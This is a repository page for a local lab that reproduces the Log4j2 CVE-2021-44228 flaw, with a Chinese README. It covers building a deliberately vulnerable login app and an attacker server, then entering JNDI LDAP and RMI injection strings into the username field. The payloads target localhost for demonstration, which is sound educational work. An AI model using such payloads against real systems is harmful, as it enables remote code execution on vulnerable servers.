# Log4j2-CVE-2021-44228 **Repository Path**: Morningyet/Log4j2-CVE-2021-44228 ## Basic Information - **Project Name**: Log4j2-CVE-2021-44228 - **Description**: Apache Log4j 漏洞(2.0 <= Apache log4j <= 2.14.1) - **Primary Language**: Java - **License**: Apache-2.0 - **Default Branch**: master - **Homepage**: None - **GVP Project**: No ## Statistics - **Stars**: 0 - **Forks**: 1 - **Created**: 2021-12-30 - **Last Updated**: 2022-07-30 ## Categories & Tags **Categories**: Uncategorized **Tags**: log, log4j2 ## README # bug-log4j2 ## 介绍 Apache Log4j 2漏洞本地重现。目前支持**ldap**和**rmi**两种类型攻击,欢迎体验。 #### ldap攻击 ```sh ${jndi:ldap://127.0.0.1:10912/hacker} ``` #### rmi攻击 ```sh ${jndi:rmi://127.0.0.1:1099/hacker} ``` ## 安装教程 #### 1. 安装Jdk,版本小于jdk-8u191 - 下载地址: [javase8-archive-downloads](https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html) - 建议版本: java version "1.8.0_74 #### 2. 安装maven - 建议版本: Apache Maven 3.6.0 #### 3. 下载代码 在目录D:/Tmp下打开Cmd工具并克隆代码 ```shell git clone https://gitee.com/Morningyet/Log4j2-CVE-2021-44228.git ``` #### 4. 编译打包 ##### 4.1 进入项目根目录 ```shell cd bug-log4j2 ``` ##### 4.2 编译打包 ```shell mvn clean package ``` #### 5. 启动被攻击应用 ##### 5.1 进入模块根目录 ```shell cd bug-log4j2-application ``` ##### 5.2 启动应用 ```sh java -jar target\bug-log4j2-application-1.0-SNAPSHOT.jar ``` #### 6. 启动发起攻击应用 ##### 6.1 进入模块根目录 ```sh cd bug-log4j2-attacker ``` ##### 6.2 启动应用 ```sh java -jar target\bug-log4j2-attacker-1.0-SNAPSHOT.jar ``` ## 使用说明 #### 1. 访问应用 在浏览器访问被攻击引用,地址:http://127.0.0.1:18080/ #### 2. 尝试正常登录系统 ##### 2.1 使用账号密码admin/123456登录 ##### 2.2 登录成功并进入用户信息页 #### 3. 使用ldap方式攻击应用 ##### 3.1 在账号栏输入如下内容,密码为任意字符串 ```sh ${jndi:ldap://127.0.0.1:10912/hacker} ``` ##### 3.2 系统登录报错 ##### 3.3 刷新页面,发现服务已不可用,被攻击应用宕机 ##### 3.4 查看被攻击应用控制台,发现输出攻击者的恶意日志"大佛保平安" 上图中"大佛保平安"图形日志打印代码位于工程bug-log4j2-attacker中`Attacker` #### 4. 使用rmi方式攻击应用 ##### 4.1 在账号栏输入如下内容,密码为任意字符串 ```sh ${jndi:rmi://127.0.0.1:1099/hacker} ``` ##### 4.2 系统登录报错 ##### 4.3 查看被攻击应用控制台,发现输出攻击者的恶意日志"美女"和"大佛保平安" 上图中"美女"图形日志打印代码位于工程bug-log4j2-attacker中`AttackerFactory` ## 结论 **被攻击服务会执行攻击者注入的恶意代码,其危险程度可显而知。**